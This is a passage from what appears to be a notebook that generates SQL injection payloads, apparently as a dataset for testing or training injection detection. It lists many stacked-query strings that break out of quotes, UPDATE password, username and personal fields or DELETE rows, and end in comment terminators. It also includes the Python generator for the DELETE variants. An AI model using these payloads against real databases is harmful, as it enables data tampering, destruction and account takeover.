 '\\"; UPDATE employee SET id_card = 1534597942738, nickname = "YwGKtxxF", tel = 0934940672, email = "vwIg6Y68X8sO8S", prefixname = "OsWsBS", lname = "nRQm", work_background = "4jBV", house_registration = "A6W6TkzRCJsEgpp", address = "bG8pY", employee_id = "NBRzK4BEQtuYmb", fname = "caUtmUYCluWz" WHERE address = "bx5YFn"# ',
 '\\"; UPDATE service SET price = 031 WHERE name = "RcyaPHGgTUjw"-- ',
 '\\"; UPDATE service SET price = 763 WHERE name = "LTFVImgGO"-- ',
 '\\"; UPDATE customer SET fname = "CpYKvg", tel = 0109071794 WHERE customer_id = "ZykLkisteEjpU"-- ',
 '\\"; UPDATE employee SET work_background = "WNwM", nickname = "WjJNjS", id_card = 1613228746928, employee_id = "X3S4vi" WHERE email = "OynC4OWbMJYJj"# ',
 '\\"; UPDATE employee SET tel = 0771854753, prefixname = "tjYjfZYLHPSC", employee_id = "gAwK", house_registration = "mr1a5rVRQS", nickname = "ghRDlqh" WHERE tel = 0344066802#',
 '\\"; UPDATE employee SET house_registration = "sRXDzl", address = "B2EQJaTDwGQ", work_background = "6x40u4sJVx64t", nickname = "jbJFGwpCFJWAwEr", email = "DYTqPSss", graduation_certificate = "J6KuvnGo9ko", fname = "dgmUdve" WHERE lname = "ITCsLDqCRSnr"#',
 '\\"; UPDATE customer SET customer_id = "mwjfMpwI5DTQeJ9" WHERE tel = 0854574704-- ',
 '\\"; UPDATE employee SET lname = "rEjoShgNPTSCk", email = "8wxnMTb5E", id_card = 1886858866237 WHERE employee_id = "YTjk0Xid03Mz"#',
 '\\"; UPDATE service SET name = "QQCPQ" WHERE name = "hAllBsXzPMvp"-- ',
 '\\"; UPDATE service SET name = "xbyTLHmePSde" WHERE price = 415-- ',
 '\\"; UPDATE service SET price = 335 WHERE name = "OEuXWChr"-- ',
 '\\"; UPDATE employee SET house_registration = "sz3BB4yWDGD", address = "x2Qns5a1", graduation_certificate = "VijIaxx", nickname = "xjKWD", id_card = 1789150583948, fname = "xfqJCRFeStqw", prefixname = "pzBzdZkSphSCSd", employee_id = "mXJGp3aJ8g", tel = 0853757668, email = "QusQcTi66VEJJ" WHERE employee_id = "Nxqkf75WOmLRv"-- ',
 '\\"; UPDATE users SET password = "tLjQOXn2FLfVwH" WHERE password = "YTnl9ZX5YV"-- ',
 '\\"; UPDATE users SET password = "vnemgijOmb8Lm" WHERE username = "DpVqEFCCtWj"#',
 '\\"; UPDATE customer SET customer_id = "2NWcKhtypq" WHERE fname = "MFOgztXQ"#',
 '\\"; UPDATE service SET price = 942 WHERE price = 158# ',
 '\\"; UPDATE customer SET lname = "mNWF" WHERE customer_id = "3VO2zieIjYZhst"-- ',
 '\\"; UPDATE service SET price = 913 WHERE price = 160#',
 '\\"; UPDATE service SET name = "QQhHu" WHERE name = "IioHUDZwJndNSHr"# ',
 '\\"; UPDATE users SET password = "m2mi2nm" WHERE username = "dEAPMYJXNhqmLXs"# ',
 '\\"; UPDATE service SET name = "rAlGkg" WHERE name = "CtjvUX"#',
 '\\"; UPDATE users SET username = "LkHbSntqTzzJxuC" WHERE username = "GFYqcU"-- ',
 '\\"; UPDATE customer SET email = "JZPm8", customer_id = "xxroKPzD5gT", lname = "ftXVHyGmm" WHERE tel = 0773110331# ',
 '\\"; UPDATE users SET username = "MIrxBVlDFnOCu" WHERE username = "mkUwae"-- ',
 '\\"; UPDATE service SET name = "MKhOt" WHERE name = "BudvRfajt"#',
 '\\"; UPDATE customer SET customer_id = "paTu4d9D", lname = "VSkXPZHooAdVKq" WHERE customer_id = "cGaqj"# ',
 '\\"; UPDATE employee SET nickname = "CUITtkWnIw", house_registration = "7xtaeV", id_card = 1598324253430, tel = 0847818241, lname = "mWCSFdJzWPNR", prefixname = "KRnNJuhz", fname = "DwTnyzlafJKjtYB", address = "E7OQns", email = "BCNhqMheS", employee_id = "x0d2LsG" WHERE id_card = 1698167391340#',
 '\\"; UPDATE service SET price = 894 WHERE name = "ISfbCa"-- ',
 '\\"; UPDATE employee SET graduation_certificate = "u2IMUsLHzCYi" WHERE lname = "DKDV"#',
 '\\"; UPDATE employee SET tel = 0469844983, prefixname = "lGWwwjenbMpHjlp", employee_id = "xbyO4r" WHERE lname = "DWveIyyutr"-- ',
 '\\"; UPDATE customer SET tel = 0237419894, email = "n76wSAM2", lname = "yJFdHSdNPI" WHERE lname = "irmXIunpChRzX"-- ',
 '\\"; UPDATE customer SET fname = "AMfNCRYW" WHERE tel = 0883067949-- ',
 '\\"; UPDATE employee SET address = "EBW2dL3Y" WHERE tel = 0243078591#',
 '\\"; UPDATE users SET password = "GKBfjEr" WHERE username = "qQOmEPusbSKkAs"-- ',
 '\\"; UPDATE service SET price = 148 WHERE name = "ZMSJSqpJZuB"-- ',
 '\\"; UPDATE customer SET tel = 0917280747, lname = "oOLslivNTBJcc", customer_id = "BiGGDuN", email = "C6bd" WHERE lname = "UYaOYTVYDXTU"#',
 '\\"; UPDATE service SET name = "ULtKl" WHERE price = 126# ',
 '\\"; UPDATE users SET password = "AZKNEL4Z52WS" WHERE username = "cOOZoEL"# ',
 '\\"; UPDATE service SET name = "LGCivzIM" WHERE name = "HNervybC"#',
 '\\"; UPDATE employee SET employee_id = "isL9r7H", tel = 0459478761 WHERE nickname = "rjIqqWr"# ',
 '\\"; UPDATE customer SET lname = "mKze" WHERE email = "Wx8miXdr3Cil2"# ',
 '\\"; UPDATE users SET username = "KnXND" WHERE password = "IHdN1F"#',
 '\\"; UPDATE service SET price = 734 WHERE price = 803#',
 '\\"; UPDATE customer SET lname = "ZvTxVB", fname = "TDXoEeVFGtXD", email = "MOBNlutCdC" WHERE email = "rIcafB4iTs2"#',
 '\\"; UPDATE customer SET lname = "SmTRYfUb", email = "25cvVG6", fname = "qxfqAWRcvXp" WHERE email = "muzQ3ror"# ',
 '\\"; UPDATE customer SET email = "l3MQtPUf3IiUnfP", fname = "erYCvxCrkGvqyMB", customer_id = "A9HkgIh7pHL" WHERE email = "6NFQc"-- ',
 '\\"; UPDATE employee SET lname = "igvOpkKm", fname = "JqzZ", id_card = 1983899090346, email = "Ym1dsUl", tel = 0276480032, address = "EB6su", employee_id = "SZwgO" WHERE id_card = 1909704837445-- ',
 '\\"; UPDATE customer SET email = "o5KC3wS9gd", fname = "PfmSEEJZwuHy", customer_id = "RzRvA1HUTJ" WHERE lname = "hBPPyerybrADbE"-- ',
 '\\"; UPDATE service SET name = "NTutMMo" WHERE price = 063#',
 '\\"; UPDATE customer SET lname = "HEXdOnN", email = "Q59UL2SL59Lm" WHERE customer_id = "j658pK3pJdzr"#',
 '\\"; UPDATE users SET username = "dusfXJdSLufvE" WHERE password = "eW2VJsLkZAWvZ"# ',
 '\\"; UPDATE users SET password = "NKv0SE" WHERE password = "y2UeZ"-- ',
 '\\"; UPDATE service SET name = "QAEb" WHERE name = "aUbgEPR"-- ',
 '\\"; UPDATE customer SET tel = 0479944581 WHERE lname = "TAWVwYyXBuz"-- ',
 '\\"; UPDATE employee SET id_card = 1600771335714, work_background = "KcoTJRjTMV", prefixname = "croSaBPvzjwXOHX", fname = "kQNO", graduation_certificate = "taf3iVY7ks", house_registration = "m6XKegVTDb", email = "gnVAhRa2", lname = "MWtJNGrIGwNlm", nickname = "CsSMy" WHERE nickname = "pVpPywwIYorXsM"#',
 '\\"; UPDATE users SET password = "yZPBUhEnqRpftt" WHERE username = "GDQnVevDTJkN"-- ',
 '\\"; UPDATE employee SET fname = "xgEcxKNCyyeKxUh", id_card = 1635955155201, house_registration = "nUwfkNs5yEtpmkw", prefixname = "mfgt", email = "7NMzUUqByxSNxl", nickname = "WesCfeeSrAw", employee_id = "3mPxtKEOl" WHERE prefixname = "YhXwRFUQUEat"#',
 '\\"; UPDATE customer SET email = "kVKnuv" WHERE fname = "MULzJXaDx"#',
 '\\"; UPDATE customer SET lname = "oStkxP" WHERE fname = "LNTf"-- ',
 '\\"; UPDATE customer SET customer_id = "rdJETrMIbp0tk" WHERE lname = "gazOftlD"-- ',
 '\\"; UPDATE users SET password = "K0Sexa" WHERE username = "lbqq"# ',
 '\\"; UPDATE users SET password = "slDYTDRGBG6h9rp" WHERE password = "zX8lliZGSKw7i"#',
 '\\"; UPDATE users SET username = "BCOCNSCVmEr" WHERE username = "taGCCBwzHUhN"-- ',
 '\\"; UPDATE employee SET house_registration = "2JKDspvNwz", email = "MdCR5VBSp" WHERE fname = "NvUhPdPryGRYsrX"# ',
 '\\"; UPDATE customer SET customer_id = "b5nerTl4lBVdxS", email = "mNxPntPG4CEc25", lname = "wTAybcavOh" WHERE lname = "EbPIfHMR"# ',
 '\\"; UPDATE users SET username = "AgaYWSs" WHERE username = "jtcGTQi"# ',
 '\\"; UPDATE customer SET tel = 0413793801, email = "WQwTw1RukXa", lname = "EPYcJT" WHERE lname = "ejxBCfmAPTz"# ',
 '\\"; UPDATE employee SET nickname = "UIHeQtRpKNoiFaq", employee_id = "7xkp4", fname = "EoUjZnBVLkszNk", lname = "FzfTSYxs" WHERE lname = "reiZPlOmhVN"# ',
 '\\"; UPDATE service SET name = "goCCnqVNuo" WHERE price = 847# ',
 '\\"; UPDATE customer SET fname = "doIl", lname = "JhPiOTlPU", customer_id = "FMhEQU74vdn", tel = 0186165195 WHERE lname = "GHLgiWMHxA"# ',
 '\\"; UPDATE users SET password = "0tTZCv4vhmI" WHERE username = "ojULtyiNh"-- ',
 '\\"; UPDATE service SET price = 297 WHERE price = 365-- ',
 '\\"; UPDATE users SET password = "ZArOeICafetA2k" WHERE username = "cCpzlMfYo"# ',
 '\\"; UPDATE customer SET fname = "diKOaPTjYhujWm" WHERE customer_id = "MoDMcT59L"# ',
 '\\"; UPDATE employee SET lname = "NCoGOSaeoCBgs", tel = 0228665079, fname = "efCrMdMwEjNpF", address = "CmyPjrjCAtPhx", id_card = 1793038931794, house_registration = "O0AE43HvqhrYrn" WHERE nickname = "CFiGo"# ',
 '\\"; UPDATE customer SET email = "I48Q9zKVYbb8" WHERE customer_id = "ISZ8X"#',
 '\\"; UPDATE users SET password = "2IgEObhm0qVWX" WHERE username = "KdVqqytgRboyaR"#',
 '\\"; UPDATE employee SET lname = "DPvyVGry", email = "aQxQX9w", work_background = "ZBauc", tel = 0551731572, address = "m9bOIkjvUCGj", id_card = 1941971600690, nickname = "amyGGeRlPZhUKw", fname = "kyiM" WHERE address = "3tCeSmmr1Q"# ',
 '\\"; UPDATE users SET password = "NTNdvT9vsAEuA" WHERE username = "frCC"#',
 '\\"; UPDATE customer SET email = "hkR1QYuHms" WHERE customer_id = "OYqMz6IVtERH"#',
 '\\"; UPDATE customer SET tel = 0886159369, email = "Yv1XddXfdwgF" WHERE tel = 0827717530#',
 '\\"; UPDATE customer SET tel = 0553212996, lname = "dtobtgQJdUoIy", fname = "wMccYcggmfvi", customer_id = "heITO" WHERE lname = "KnnrQpnPDGDHOT"-- ',
 '\\"; UPDATE customer SET lname = "DdSy", email = "RCNw0Vv", fname = "BRwGiBukqJuDCaw", customer_id = "cYGmdNy49BrqxRX" WHERE email = "CSQoBZV"# ',
 '\\"; UPDATE users SET username = "KjAFrPHoDAZw" WHERE username = "idKwASMGPoz"-- ',
 '\\"; UPDATE employee SET id_card = 1794991501890, lname = "EYtNSTNvJ", address = "hV6Vw3TRmgDBJ", employee_id = "PF8LQBSb" WHERE address = "W12KfKbBUwXvi"# ',
 '\\"; UPDATE employee SET address = "6yrXAy6", email = "1ILR4KgER", lname = "XpGWYKvh", prefixname = "PVTVHHeuNhw", id_card = 1534221570236, nickname = "PAlzexfDEIXnpz", fname = "IbHzyWlACqkIa", graduation_certificate = "jwdaWikokt", house_registration = "xVC7j8LGMqA", work_background = "MXykL" WHERE id_card = 1891863430453#',
 '\\"; UPDATE users SET username = "iYJpwfKqFX" WHERE username = "RfCzkFYoTBpfQq"-- ',
 '\\"; UPDATE users SET username = "ISYQhMAuGP" WHERE password = "JkW9"# ',
 '\\"; UPDATE customer SET tel = 0873188891, lname = "dQnJMD" WHERE email = "H8aVI0bRC"# ',
 '\\"; UPDATE service SET price = 378 WHERE name = "KOqseBT"# ',
 '\\"; UPDATE employee SET graduation_certificate = "sXOCAnrMQ", fname = "CXKmzy", email = "NpFqPdGNpPj", prefixname = "vxibJbBcrDoW", lname = "daLD", id_card = 1904511960834 WHERE address = "X7E0AJ"#',
 '\\"; UPDATE service SET price = 557 WHERE name = "LKrjxUJXMXZH"# ',
 '\\"; UPDATE employee SET work_background = "jDyWvLZu0" WHERE nickname = "BIWkBJh"# ',
 '\\"; UPDATE service SET price = 843 WHERE price = 738# ',
 '\\"; UPDATE employee SET email = "0VOZTxPnG", id_card = 1974070199949, house_registration = "NRDQ", graduation_certificate = "Vy8h", work_background = "5d6qyt" WHERE nickname = "mkOkODarWlJpeIk"-- ',
 '\\"; UPDATE users SET password = "5GfU7" WHERE username = "NnfamlfsBhMZNv"# ',
 '\\"; UPDATE users SET username = "PfqUg" WHERE username = "GgRiKCSDM"-- ',
 '\\"; UPDATE users SET password = "OGZYBKVv" WHERE username = "dhVvCHDcva"-- ',
 '\\"; UPDATE employee SET fname = "qsiMnyNOkOv", tel = 0583742275, prefixname = "IDGgyCNElNaj", id_card = 1963880940728, nickname = "TVotcyMA", work_background = "q87O", house_registration = "HCdtKfrOyAWr2LR", graduation_certificate = "pyjgHiPQIXR", employee_id = "5fjo", lname = "IDhVhdmDiLi", email = "ZI65iqBzSA" WHERE employee_id = "oYjVaeUK"-- ',
 '\\"; UPDATE customer SET fname = "dDvQ", tel = 0918369784, email = "LNhySMCNyxTp", lname = "GiOyHJi" WHERE fname = "oWCfHaZ"# ',
 '\\"; UPDATE employee SET lname = "BTqASwS" WHERE tel = 0776974525# ',
 '\\"; UPDATE customer SET tel = 0475792085, fname = "kanVuBYvqYd" WHERE customer_id = "N0WOU0QUNTE"-- ',
 '\\"; UPDATE users SET username = "olGd" WHERE password = "8VTfx9pZ4qeF"-- ',
 '\\"; UPDATE employee SET lname = "NSOeaoVpJkDu", id_card = 1893830726652, employee_id = "LTNOxQBQcy", nickname = "yhRFLaiomTLVqn", address = "OF1tkN", email = "1pLhc9ZXZpb0", prefixname = "qSqLAgJVyaNEo", house_registration = "JZkQ", work_background = "TZzrl4", fname = "HbJTXJAuCKnHVp" WHERE graduation_certificate = "bIQy1gDnRmNUUO"-- ',
 '\\"; UPDATE users SET password = "sRh4aK" WHERE username = "dvLYHixKqCVBO"-- ',
 '\\"; UPDATE employee SET prefixname = "ZzGAWlQu", work_background = "Q0pg0Ib", tel = 0536889962, id_card = 1712007287949, employee_id = "5oagv", house_registration = "NjN5h", email = "qJDFzBUR", nickname = "pBYIhppfMP", lname = "MEnLNxLmTYuBA", fname = "kbqun", graduation_certificate = "g02YUoQEyk" WHERE prefixname = "kvbOsRBdYtfrgF"#',
 '\\"; UPDATE employee SET nickname = "STKpuPiPYCGXM", lname = "QKWQpFDBWRcLI", address = "w59p6q3f0XG9H", tel = 0100509126, employee_id = "FdVmdMOrbm", fname = "asyQoKmJ", prefixname = "zmESVVTfi", work_background = "wtEfipX0KMf" WHERE tel = 0142830834#',
 '\\"; UPDATE customer SET tel = 0960424206 WHERE fname = "wevpxo"# ',
 '\\"; UPDATE users SET username = "TIHZZJ" WHERE username = "FNVG"-- ',
 '\\"; UPDATE users SET username = "CrMXvwZa" WHERE password = "HgbBIzCUoqI"-- ',
 '\\"; UPDATE service SET name = "yTHJybvrtFGy" WHERE price = 789#',
 '\\"; UPDATE users SET password = "koR3niI" WHERE password = "jdRjDdnet"#',
 '\\"; UPDATE employee SET house_registration = "RqamMMLn", email = "1qEU", employee_id = "s0Wif", address = "E3Zmts", fname = "GVIfl", id_card = 1921900338366, work_background = "W4aTYKB", tel = 0857225567, prefixname = "ubaogCZmKrLrhe", nickname = "mjOysnBEOqYV", graduation_certificate = "nPVKsAUScTADi" WHERE prefixname = "IIgmozkaNgq"# ',
 '\\"; UPDATE users SET username = "ecLMXt" WHERE username = "eARIJTDYQyqoXe"# ',
 '\\"; UPDATE customer SET lname = "BysTjTGSMZqY", customer_id = "pSlyeoQ", fname = "ugquCxQZdcdUG" WHERE fname = "PnZsXvEHjbLw"#',
 '\\"; UPDATE customer SET lname = "tnIz", tel = 0626198647, customer_id = "CNZH", email = "ZFFyR" WHERE fname = "yZFQZYbU"# ',
 '\\"; UPDATE users SET username = "SCSebFE" WHERE username = "UPct"-- ',
 '\\"; UPDATE employee SET id_card = 1549034779965, address = "tGKb", lname = "UHivYX", fname = "uptJzwPAEMap", tel = 0580665676, graduation_certificate = "ErUzi8lcG", prefixname = "BMENbvVBErBsxa", email = "17I5nf9Cy0h" WHERE id_card = 1970870035769# ',
 '\\"; UPDATE employee SET house_registration = "2efaUV1p3e", employee_id = "ds5g4OsntZD" WHERE lname = "wUWnKN"# ',
 '\\"; UPDATE employee SET nickname = "dhDTOVM", work_background = "TlA9D7BxpkX", lname = "cOuA", email = "dFrBX8Yv", address = "MGjOrsTSZ0UmNE", fname = "hXUKoONXYxsNAw", prefixname = "AuQHQqteVkAHXc", id_card = 1983223167458 WHERE email = "n3iEmJfZS5qr"#',
 '\\"; UPDATE users SET password = "lrdscHUBUevDca9" WHERE password = "RbEd6AGcsCC"-- ',
 '\\"; UPDATE users SET username = "MiOrYqwlNeiYsa" WHERE username = "RdyMuGhSjMDdYio"#',
 '\\"; UPDATE service SET price = 839 WHERE name = "fFRXlJtlPsExpE"# ',
 '\\"; UPDATE service SET name = "NHhWpdbHiHkxoy" WHERE name = "wzyMQ"# ',
 '\\"; UPDATE service SET name = "CkymblUmMghVqHe" WHERE price = 372#',
 '\\"; UPDATE service SET price = 695 WHERE price = 335# ',
 '\\"; UPDATE customer SET email = "3cWls", customer_id = "B7aGiKu" WHERE tel = 0185677868#',
 '\\"; UPDATE customer SET tel = 0266397484 WHERE lname = "SfoSYAMlpMG"# ',
 '\\"; UPDATE customer SET fname = "wdbdusypyVHk", email = "NHDu", customer_id = "OTarQ", lname = "KgYDaK" WHERE tel = 0783030730# ',
 '\\"; UPDATE customer SET fname = "qbXxwWvwxYBLpSR", tel = 0854652626 WHERE lname = "guHODhzEWP"-- ',
 '\\"; UPDATE employee SET address = "aqXVW", employee_id = "MkYzhv8cjyov7Q", fname = "hAEqDqK", house_registration = "oR0UtbC5DM", prefixname = "TcUEuuiJFu", email = "zSHRZr", graduation_certificate = "kPUm", work_background = "TtlhFLcg", lname = "LXsFdywvWYPQ", tel = 0406900137 WHERE nickname = "odlJuypDMzTxWMt"-- ',
 '\\"; UPDATE customer SET lname = "FJXTCUcDAnmmeQ", tel = 0574800840, email = "QB1p8nPIcf4O", fname = "DbYsZ" WHERE tel = 0853599054-- ',
 '\\"; UPDATE service SET price = 091 WHERE name = "SIiJuVcKoKooJPx"-- ',
 '\\"; UPDATE users SET password = "s8F2R" WHERE username = "SOBaHQPPBpmV"# ',
 '\\"; UPDATE customer SET email = "s5o1IUB" WHERE email = "4ey6gl"#',
 '\\"; UPDATE service SET price = 225 WHERE price = 831-- ',
 '\\"; UPDATE customer SET fname = "WKvhDQyct", customer_id = "yaSJeh", lname = "uDbGx" WHERE fname = "owGaTlTxrgyQ"#',
 '\\"; UPDATE employee SET address = "F450o8J2frdKA1T", prefixname = "yOlJzIel", employee_id = "Ke0jKMDY2NlkR", work_background = "bPamjExEvafMWC", id_card = 1554676066554, fname = "kLoOr" WHERE prefixname = "hnyYfUMjvljvNe"-- ',
 '\\"; UPDATE employee SET email = "6IJCJ3KJVde0E", prefixname = "egauFQKe", tel = 0992616498, id_card = 1500490793684, lname = "ajUKWKMuxCxrd", employee_id = "P4ybJSk7vAoU", nickname = "iFGZiQgaqsIqW", work_background = "52RE0cGYfdO", house_registration = "yFBv", graduation_certificate = "zq6rwqHMRC04" WHERE email = "64Ha"#',
 '\\"; UPDATE employee SET prefixname = "SXqv", nickname = "TGZfTZKQSYrsY", email = "gfTj3FAIal", work_background = "LoHcMB9jq", lname = "cQwVsGDVWxtCF", address = "UNIVylx1", employee_id = "vgO7yR", id_card = 1502400055478, fname = "aGpaEqZAdBd" WHERE email = "5hSB"# ',
 '\\"; UPDATE employee SET prefixname = "QSOJZyZtO", email = "jKlL", house_registration = "zdftPEnR", fname = "QPRFVT", nickname = "JrlobhFIzX", address = "KrrGjxCm2T", tel = 0797530382, lname = "gfuk", id_card = 1661764479906, graduation_certificate = "X3FeGzmx" WHERE nickname = "KrAIPepRmoAaXF"#',
 '\\"; UPDATE employee SET prefixname = "WfnCtPFjEhFQH", address = "nubnwMXWCyltE2", nickname = "FdmQUGnrjFqRqwU", tel = 0182903431 WHERE email = "ZJLrvFZ"-- ',
 '\\"; UPDATE customer SET fname = "peGcxMVwfQ", lname = "tVVNa", email = "qpcckyQd6IeGKdu" WHERE tel = 0796415720-- ',
 '\\"; UPDATE users SET username = "uIihJ" WHERE username = "ERMBpLKagfcVqqg"#',
 '\\"; UPDATE users SET password = "lYcslu89cL11s" WHERE password = "ExKl0eWrYF"-- ',
 '\\"; UPDATE employee SET lname = "mRCpVzOrBINM", house_registration = "VVdDCvssvNzoK" WHERE email = "HVUgOyTr"#',
 '\\"; UPDATE users SET username = "XjlHBwciZaGfKf" WHERE password = "wFkElsb7yNOX"# ',
 '\\"; UPDATE employee SET tel = 0274913577, email = "RYb4yZO", prefixname = "fHFY", id_card = 1890030786616, employee_id = "tYG6c0jUMnbtr", work_background = "vlYRg", nickname = "aQmLmvWy", house_registration = "K21wn537SFU9p", address = "rcxgP7yH", fname = "QfEXEBTiYjpsD" WHERE graduation_certificate = "udlBFLfVqr3K"# ',
 '\\"; UPDATE customer SET lname = "Ntlw" WHERE fname = "hSgwYWfWg"#',
 '\\"; UPDATE service SET name = "NdyrTHxAdxn" WHERE name = "XUsnp"#',
 '\\"; UPDATE service SET price = 900 WHERE price = 983-- ',
 '\\"; UPDATE customer SET tel = 0230307600, customer_id = "w4VepXtmIAfpUA", email = "1BodK66", lname = "KgZL" WHERE email = "og8aTzaAXBd0ov"-- ',
 '\\"; UPDATE employee SET graduation_certificate = "HV4rL1Y4AV", nickname = "oIETPCGQ", id_card = 1564811443265, email = "JDfmXcN9mW", employee_id = "thbs8HQdp5" WHERE graduation_certificate = "Lv5kqeKagQ0"# ',
 '\\"; UPDATE employee SET email = "dnxxy", lname = "aDVZEfqBLwRleeW", graduation_certificate = "JzijmlGkIYNshI", id_card = 1927826122797, house_registration = "WVUXJRuI9WFw", fname = "BkpErqwecj", prefixname = "djLk" WHERE graduation_certificate = "H5kcVTLN5"# ',
 '\\"; UPDATE employee SET id_card = 1956750241646, graduation_certificate = "UxtL14uDv2qw", house_registration = "QWdKxha" WHERE prefixname = "OnNbCymUQybblWT"#',
 '\\"; UPDATE users SET username = "fqMRKsKQr" WHERE password = "OLneVaW7HUk2C"-- ',

In [8]:
def randomDeleteForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        first = type_of_value[random_table_value]
        if first == "tel":
            random_string = generate_random_string_tel()
        elif first == "price":
            random_string = generate_random_string_price()
        elif first == "id_card":
            random_string = generate_random_string_id_card()
        elif first == "str":
            random_string = generate_random_string_str()
        elif first == "both":
            random_string = generate_random_string_both()
        preStr += r'\"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + random_last
        # randomOperator = operator[random.randint(0, len(operator)-1)]
        # if (randomOperator) == "":
        #     gen.append('"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + random_last)
        # else:
        #     gen.append('"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + randomOperator)
        #     random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        #     first2 = type_of_value[random_table_value]
        #     if first2 == "tel":
        #         random_string2 = generate_random_string_tel()
        #     elif first2 == "price":
        #         random_string2 = generate_random_string_price()
        #     elif first2 == "id_card":
        #         random_string2 = generate_random_string_id_card()
        #     elif first2 == "str":
        #         random_string2 = generate_random_string_str()
        #     elif first2 == "both":
        #         random_string2 = generate_random_string_both()
        #     gen[i] += random_table_value2 + " = " + random_string2 + random_last
        if preStr in gen:
            continue
        else:
            gen.append(preStr)

    return gen

In [9]:
randomDeleteForSearch(table, table_value, last)

['\\"; DELETE FROM service WHERE name = "WkpwGQZHcKaI"# ',
 '\\"; DELETE FROM users WHERE username = "RFHggapefAHwDo"#',
 '\\"; DELETE FROM service WHERE price = 499-- ',
 '\\"; DELETE FROM employee WHERE work_background = "3P64"# ',
 '\\"; DELETE FROM customer WHERE customer_id = "vggx2oWDCzd"# ',
 '\\"; DELETE FROM service WHERE name = "TaNXBRvsolAQzu"# ',
 '\\"; DELETE FROM users WHERE username = "EUgUGbVVq"# ',
 '\\"; DELETE FROM customer WHERE email = "BnTORwityP7wt"-- ',
 '\\"; DELETE FROM employee WHERE fname = "SYumxUurIp"#',
 '\\"; DELETE FROM users WHERE password = "S3ONkszl8"# ',
 '\\"; DELETE FROM service WHERE name = "MoKzIGqfOO"#',
 '\\"; DELETE FROM service WHERE price = 613#',
 '\\"; DELETE FROM employee WHERE graduation_certificate = "Si1ad5QghvOkIeG"-- ',
 '\\"; DELETE FROM users WHERE username = "XvlhfRQA"#',
 '\\"; DELETE FROM service WHERE name = "kcTFHhiVVDlgg"# ',
 '\\"; DELETE FROM users WHERE username = "YFRxUfmmbmFm"#',
 '\\"; DELETE FROM employee WHERE id_card = 1686853328790#',
 '\\"; DELETE FROM service WHERE name = "debjzqobCLjNgL"# ',
 '\\"; DELETE FROM employee WHERE tel = 0534067329#',
 '\\"; DELETE FROM service WHERE price = 951-- ',
 '\\"; DELETE FROM service WHERE price = 554-- ',
 '\\"; DELETE FROM users WHERE password = "nAsXEwHOkrYFJ"#',
 '\\"; DELETE FROM service WHERE price = 075-- ',
 '\\"; DELETE FROM service WHERE price = 225#',
 '\\"; DELETE FROM users WHERE username = "sJvCntkR"# ',
 '\\"; DELETE FROM employee WHERE address = "s9xVds"# ',
 '\\"; DELETE FROM employee WHERE prefixname = "qhBxRrZV"# ',
 '\\"; DELETE FROM users WHERE username = "fLKeAExWu"# ',
 '\\"; DELETE FROM employee WHERE work_background = "J2qWx9DD1"# ',
 '\\"; DELETE FROM service WHERE name = "JkyzPezPrVxPj"# ',
 '\\"; DELETE FROM employee WHERE house_registration = "hv1YWXNbtRS"-- ',
 '\\"; DELETE FROM customer WHERE lname = "kTNbGdCXPCzM"# ',
 '\\"; DELETE FROM employee WHERE address = "dNMllujZ1I"#',
 '\\"; DELETE FROM service WHERE price = 477# ',
 '\\"; DELETE FROM users WHERE username = "hoTmsiWjzPlbQKS"#',
 '\\"; DELETE FROM users WHERE password = "KRqfy"#',
 '\\"; DELETE FROM employee WHERE house_registration = "LGRjV9KyCD9k"-- ',
 '\\"; DELETE FROM customer WHERE fname = "NDaKpkKkxyO"# ',
 '\\"; DELETE FROM users WHERE password = "HyRxX9Hg"-- ',
 '\\"; DELETE FROM service WHERE price = 600# ',
 '\\"; DELETE FROM employee WHERE house_registration = "u2KowcrYZGU"-- ',
 '\\"; DELETE FROM service WHERE name = "BOXRlJO"-- ',
 '\\"; DELETE FROM employee WHERE address = "trcop"# ',
 '\\"; DELETE FROM users WHERE username = "DuirpQuDVBJd"# ',
 '\\"; DELETE FROM customer WHERE email = "4AeHDyUpak5c0"# ',
 '\\"; DELETE FROM service WHERE price = 172-- ',
 '\\"; DELETE FROM employee WHERE email = "9E6rR3O3FX1q"-- ',
 '\\"; DELETE FROM service WHERE price = 670# ',
 '\\"; DELETE FROM employee WHERE employee_id = "rLz3rp6l"#',
 '\\"; DELETE FROM service WHERE price = 189# ',
 '\\"; DELETE FROM service WHERE price = 501# ',
 '\\"; DELETE FROM service WHERE price = 040# ',
 '\\"; DELETE FROM employee WHERE email = "eo60T8c"-- ',
 '\\"; DELETE FROM customer WHERE tel = 0856178173#',
 '\\"; DELETE FROM customer WHERE tel = 0910815076-- ',
 '\\"; DELETE FROM customer WHERE tel = 0703807191-- ',
 '\\"; DELETE FROM service WHERE price = 193# ',
 '\\"; DELETE FROM customer WHERE customer_id = "zQKa6azkmls"#',
 '\\"; DELETE FROM employee WHERE house_registration = "NQRaBTkQ"# ',
 '\\"; DELETE FROM employee WHERE lname = "lQlGxmdtRR"#',
 '\\"; DELETE FROM service WHERE price = 842#',
 '\\"; DELETE FROM customer WHERE customer_id = "rNGxUlAiI6c"-- ',
 '\\"; DELETE FROM customer WHERE email = "GXTePkHnjv"# ',
 '\\"; DELETE FROM service WHERE name = "vBqIphKcLb"#',
 '\\"; DELETE FROM customer WHERE lname = "ucaYPbqRFkaKvDx"#',
 '\\"; DELETE FROM customer WHERE customer_id = "5Y9lEIX6YNOYXag"# ',
 '\\"; DELETE FROM service WHERE name = "JekJBoIMqF"# ',
 '\\"; DELETE FROM employee WHERE lname = "vdAGzhEyaiXpBBb"-- ',
 '\\"; DELETE FROM employee WHERE email = "DSFAMHLl"-- ',
 '\\"; DELETE FROM service WHERE name = "nXZmkDvQadmdPJ"-- ',
 '\\"; DELETE FROM employee WHERE fname = "rDwdtwcKmI"#',
 '\\"; DELETE FROM employee WHERE house_registration = "Si33"#',
 '\\"; DELETE FROM customer WHERE lname = "TfDL"-- ',
 '\\"; DELETE FROM customer WHERE lname = "xdocfIJAJSdgHAf"#',
 '\\"; DELETE FROM users WHERE password = "6tw3SpZCYFQo"#',
 '\\"; DELETE FROM customer WHERE lname = "kOYgPHHGKJ"# ',
 '\\"; DELETE FROM users WHERE password = "5GoFaon06vZKt"# ',
